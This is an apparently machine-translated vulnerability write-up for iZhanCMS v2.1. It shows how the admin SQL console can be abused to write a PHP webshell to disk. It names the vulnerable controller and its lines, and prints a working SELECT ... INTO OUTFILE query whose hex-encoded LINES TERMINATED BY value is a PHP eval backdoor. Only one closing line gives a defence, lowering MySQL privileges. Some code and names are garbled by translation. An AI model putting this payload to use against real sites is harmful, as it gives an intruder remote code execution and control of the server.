v2.1 code execution vulnerability analysis

Posted by fierce at 2020-04-06

Website source code version: love station CMS (zend6.0) v2.1

Default user name: admin password self setting

Test website home page:

1. Vulnerability file location:

/In line 185-221 of admin / application / webset / Controllers / dbcomandcontroller.php:

In this function, the submitted SQL parameters are restored, whether the SQL statement is deleted or not is detected, and then the SQL statement is processed. Instead of filtering the sensitive functions such as the into outfile, the SQL statement is directly brought into the database for execution. We can construct the SQL statement and write it to webshell to trigger the Code Execution Vulnerability and control the server.

Login background - system settings - database operation - SQL statement - execute SQL statement.

Problem: the input character will be HTML entity encoded, so the traditional into outfile statement cannot be used to write the file successfully

Select '? PHP Eval ($_post [CMD]);?' into outfile 'C: / www / 222aaa. PHP' write failed

SELECT 111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php' LINES TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E –

Write webshell successfully, control website server

1. Mysql database authority reduction processing, so that the intruder can not do under high authority to do things!